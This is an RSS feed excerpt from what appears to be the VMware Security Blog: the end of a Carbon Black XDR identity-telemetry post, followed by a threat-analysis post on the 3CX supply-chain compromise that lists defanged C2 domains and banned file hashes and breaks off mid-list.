https://blogs.vmware.com/security/files/2022/03/Endpoint-Security_Thumbnail-e1658437535835-600x381.png
600w" sizes="(max-width: 300px) 100vw, 300px" /></div><p><span
data-contrast="auto">Endpoint security is recognizably an essential part of
modern cybersecurity, and endpoint security tools are in many cases a first and
last line of defense. Endpoint security is focused on securing servers,
workloads, end-user workstations, laptops, and any other devices that are used
to access corporate networks and SaaS applications.  </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">Generally, endpoint security is regarded as a
mature market and well-understood discipline; defend against malware and
non-malware-based attacks (Next Generation Antivirus &#8211; NGAV), monitor and
manage the baseline security state and vulnerabilities of the endpoint, manage
the endpoint host-based firewall (HBFW), and detect and respond to attacks
(Endpoint Detection and Response &#8211; EDR). These are all well understood and
in Carbon Black’s case, all disciplines we excel at and deliver through our
platform, VMware Carbon Black Cloud.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">The reality however is that threat actors continue
to adapt and evolve to evade security tools, and so security tools and processes
must also evolve to meet them. </span><b><span data-contrast="auto">This is the
driving force behind VMware Carbon Black’s evolution of EDR into extended
detection and response (XDR) – ensuring that we continue to empower users and
partners to stay ahead of the latest threats.</span></b><span
data-contrast="auto">  </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">Put simply, XDR is the natural evolution of EDR.
XDR adds additional telemetry types, such as identity and network, to the
</span><i><span data-contrast="auto">existing</span></i> <i><span
data-contrast="auto">process-related</span></i><span data-contrast="auto">
telemetry we have always delivered with EDR. Additional telemetry types increase
signal fidelity and provide additional means to detect suspicious activity,
reducing the mean time to detect and respond (MTTD/MTTR). With </span><a
href="https://www.vmware.com/solutions/xdr-security.html"><span
data-contrast="none">VMware Carbon Black XDR</span></a><span
data-contrast="auto"> we natively collect and analyze identity, network, and EDR
telemetry, all without requiring changes to the network configuration or the
installation of additional software or hardware.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">EDR, network, and identity telemetry are all equal
pillars of XDR, but for this blog I want to focus on why identity is so
important as the network pillar will be expanded on in a future blog
post. </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">To stay ahead of the attacker, it is essential to
have a clear view of </span><i><span data-contrast="auto">who</span></i><span
data-contrast="auto"> is accessing the network, from where, and on which device.
This statement addresses the reality that a significant number of attacks
involve the creation of new user accounts or identities, account takeover, and
privilege escalation, and this is where user authentication visibility comes
in. </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">Carbon Black Cloud is now able to collect events
associated with a broad range of identity intelligence or user authentication
activity including logon/logoffs, failed logins, account lockouts, privilege
assignments, etc.  This capability provides critical insights into who is
accessing the network, from which device, and from where. We collect this
telemetry, index it, and make it searchable in the same Carbon Black Cloud
console customers are using today to search process (and network) telemetry. 
The output of the combined telemetry from Carbon Black Cloud is invaluable for
detecting and preventing attacks by malicious actors who may use stolen or
compromised credentials to gain access to sensitive data or systems.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">There are many benefits of combining user
authentication visibility with endpoint security:</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<ul> <li data-leveltext="" data-font="Symbol" data-listid="2"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><b><span
data-contrast="auto">Early detection of suspicious activity:</span></b><span
data-contrast="auto"> By monitoring user authentication, endpoint security
platforms can detect suspicious login attempts or unusual activity on the
network. This information can be used to trigger alerts and prompt security
teams to investigate potential threats early before they have a chance to cause
significant damage.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="2"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><b><span
data-contrast="auto">Improved incident response:</span></b><span
data-contrast="auto"> User authentication visibility can also provide critical
information in the event of a security incident. By knowing who was logged in at
the time of an incident, security teams can quickly identify potential sources
of the problem and take appropriate action to contain and mitigate the
impact.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="2"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><b><span
data-contrast="auto">Enhanced compliance:</span></b><span data-contrast="auto">
Many compliance regulations require organizations to track and monitor user
access to sensitive data and systems. User authentication visibility can help
organizations meet these requirements and avoid costly penalties for
non-compliance.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="2"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><b><span
data-contrast="auto">Improved access control:</span></b><span
data-contrast="auto"> User authentication visibility can also help organizations
improve access control by identifying users who have excessive or inappropriate
access privileges. This information can be used to adjust access policies and
prevent potential security breaches.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
</ul> <p><span data-contrast="auto">As a security practitioner and as someone
who has built security products for over eight years, my top priority is to
ensure our customers, partners, and the organizations they defend are protected
against modern threats.  The inclusion of identity intelligence in Carbon Black
Cloud is another way we’re helping empower security professionals to keep their
organizations safe.  </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">We will continue to evolve the capability based on
feedback from YOU. To learn more, </span><a
href="https://www.vmware.com/resources/security/demo.html"><span
data-contrast="none">schedule a demo</span></a><span data-contrast="auto">, join
the Customer Advisory Board, and if you’re at the <a
href="https://engage.vmware.com/rsa2023" target="_blank" rel="noopener">RSA
Conference</a> – stop by our booth!  </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">Happy Hunting. </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p><p>The
post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/04/xdr-identity-matters-who-you-know-is-as-important-as-what-you-know.html">XDR:
Identity Matters – Who You Know is As Important as What You Know</a> appeared
first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware
Security Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>Investigating 3CX Desktop Application Attacks: What You Need to
Know</title>
<link>https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html?utm_source=rss&utm_medium=rss&utm_campaign=investigating-3cx-desktop-application-attacks-what-you-need-to-know</link>
<dc:creator>
<![CDATA[ Threat Analysis Unit ]]>
...
</dc:creator>
<pubDate>Fri, 31 Mar 2023 16:59:31 +0000</pubDate>
<category>
<![CDATA[ Threat Analysis Unit ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83435</guid>
<description>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png
300w,
https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png
410w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>This is a developing
situation and this blog post will be updated as needed.  Reports of malicious
code associated with the 3CX desktop application – part of the 3CX VoIP (Voice
over Internet Protocol) platform – began on March 22, 2023. On March 30, 2023,
3CX confirmed the compromise, noting the affected 3CX desktop app &#8230; <a
href="https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html">Investigating
3CX Desktop Application Attacks: What You Need to Know</a> appeared first on <a
rel="nofollow" href="https://blogs.vmware.com/security">VMware Security
Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png
300w,
https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png
410w" sizes="(max-width: 300px) 100vw, 300px" /></div><p><i><span
data-contrast="auto">This is a developing situation and this blog post will be
updated as needed.</span></i><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="none">Reports of malicious code associated with the 3CX
desktop application – part of the 3CX VoIP (Voice over Internet Protocol)
platform – began on March 22, 2023. On March 30, 2023, 3CX </span><a
href="https://www.3cx.com/blog/news/desktopapp-security-alert/"><span
data-contrast="none">confirmed</span></a><span data-contrast="none"> the
compromise, noting the affected 3CX desktop app versions were 18.12.407 and
18.12.416 for Windows and 18. 11.1213, 18.12.402, 18.12.407 and 18.12.416
versions for Mac. NIST National Vulnerability Database has assigned </span><a
href="https://nvd.nist.gov/vuln/detail/CVE-2023-29059"><span
data-contrast="none">CVE-2023-29059</span></a><span data-contrast="none"> to
track this issue.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="none">Reports indicate that one of the bundled libraries
included with the 3CX Windows and Mac desktop clients had been altered to
contact command and control infrastructure, including a GitHub repository, to
deliver second-stage malware. According to 3CX, the malicious domains and the
GitHub repository have since been taken down. </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><b><span data-contrast="auto">What is the potential impact?</span></b><span
data-contrast="auto"> </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">Software supply chain attacks, as seen with the
SolarWinds attack in December 2020, can lead to security teams discovering that
their environment has been breached months prior in what is disguised as a
standard software update. This highlights the challenges associated with
software validation as part of supply chains. The impact of such an attack can
be devastating, causing long-term damage to the business, its reputation, and
its customers</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">In the case of this 3CXDesktopApp attack, there is
not yet enough information on how the compromised code ended up being included
with 3CX digitally signed installers. 3CX </span><a
href="https://www.3cx.com/blog/news/desktopapp-security-alert-updates/"><span
data-contrast="none">has hired</span></a><span data-contrast="auto"> Mandiant to
assist with forensic activities. </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><b><span data-contrast="auto">Observations by VMware Threat Analysis
Unit</span></b><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><i><span data-contrast="auto">Note: This is a developing situation and threat
analysis will be updated as needed.</span></i><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">VMware Contexa detected the first connections to
the C2 domains included in the ICO files as early as 2023-03-06
(akamaitechcloudservices[.]com) and 2023-03-07 (pbxphonenetwork[.]com,
sbmsa[.]wiki, azureonlinestorage[.]com, officeaddons[.]com, pbxsources[.]com,
officestoragebox[.]com). See </span><span data-contrast="auto">Figure
1</span><span data-contrast="auto"> for the whole timeline. </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM.png"><img
decoding="async" loading="lazy" class="alignnone size-large wp-image-83437"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-1024x607.png"
alt="" width="1024" height="607"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-1024x607.png
1024w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-300x178.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-768x455.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-1536x911.png
1536w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM-600x356.png
600w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.50.18-AM.png
1646w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></span></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">1</span></i><i><span data-contrast="none">: Connections to
C2 domains as detected by VMware Contexa.</span></i><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:200,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">TLS connections to visualstudiofactory[.]com
taking place on 2023-03-24 and later were established to a server with a
certificate with the following hash
‘cda34a2b46a2269dc5934967175656a81bd3667a21855273dc2c777f8bd2d4c9’, valid from
2022-11-17, expiring on 2023-11-17, and issued by “C=GB, ST=Greater Manchester,
L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server
CA”. The recorded JA3S is 61be9ce3d068c08ff99a857f62352f9d, although note that
it is only useful when looking for TLS connections established by the
compromised 3CX desktop app.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span><span
data-contrast="auto">A </span><a
href="https://search.censys.io/certificates-legacy?q=parsed.fingerprint_sha256%3A+cda34a2b46a2269dc5934967175656a81bd3667a21855273dc2c777f8bd2d4c9&amp;"><span
data-contrast="none">search on Censys</span></a><span data-contrast="auto"> can
also reveal that the host had been online since 2022-11-19; our telemetry,
however, does not show any activity related to this C2 domain prior to March
2023.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="none">Current hashes identified to be banned are the
following:</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">Compromised parents/Installers</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<ul> <li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><span
data-contrast="auto">59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><span
data-contrast="auto">aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><span
data-contrast="auto">7c55c3dfa373b6b342390938029cb76ef31f609d9a07780772c6010a4297e321</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><span
data-contrast="auto">e32cc0103827e8eef5881bd6fcae30ccc6bf6d68e8378c007a8fac2d8edbc071</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="5" data-aria-level="1"><span
data-contrast="auto">B5e318240401010e4453e146e3e67464dd625cfef9cd51c5015d68550ee8cc09</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
</ul> <p><span data-contrast="auto">Zip file</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<ul> <li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="6" data-aria-level="1"><span
data-contrast="auto">5c54932fdbb077d73c58ac41a1ad3f6ea5576b3e1f719c8b714b637c9ceb361b</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><span
data-contrast="auto">b57d7e6c47516aeb1fd8384a9bc002f8c637b7d42b8f008a0c9e872914344dad</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
</ul> <p><span data-contrast="auto">ffmpeg.dll  </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<ul> <li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="8" data-aria-level="1"><span
data-contrast="auto">7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="9" data-aria-level="1"><span
data-contrast="auto">c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><span
data-contrast="auto">253f3a53796f1b0fbe64f7b05ae1d66bc2b0773588d00c3d2bf08572a497fa59</span>
<span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
</ul> <p><span data-contrast="auto">d3dcompiler_47.dll</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<ul> <li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="11" data-aria-level="1"><span
data-contrast="auto">11be1803e2e307b647a8a7e02d128335c448ff741bf06bf52b332e0bbf423b03</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
</ul> <p><span data-contrast="auto">Secondary stage Payloads</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<ul> <li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="12" data-aria-level="1"><span
data-contrast="auto">851c2c99ebafd4e5e9e140cfe3f2d03533846ca16f8151ae8ee0e83c692884b7 </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><span
data-contrast="auto">6a0f637546684c90809cf264c22a861c9a07b1ca3b2ef6a359a14d612e392c1a </span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="14" data-aria-level="1"><span
data-contrast="auto">aa4e398b3bd8645016d8090ffc77d15f926a8e69258642191deb4e68688ff973</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="15" data-aria-level="1"><span
data-contrast="auto">F5fdefaa5321e2cea02ef8b479de8ec3c5505e956ea1484c84a7abb17231fe24</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="4"
data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}"
aria-setsize="-1" data-aria-posinset="16" data-aria-level="1"><span
data-contrast="auto">8ab3a5eaaf8c296080fadf56b265194681d7da5da7c02562953a4cb60e147423</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
</ul> <p aria-level="5"><b><span data-contrast="none">MacOS
Samples</span></b><span
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></p>
<ul> <li data-leveltext="" data-font="Symbol" data-listid="4"
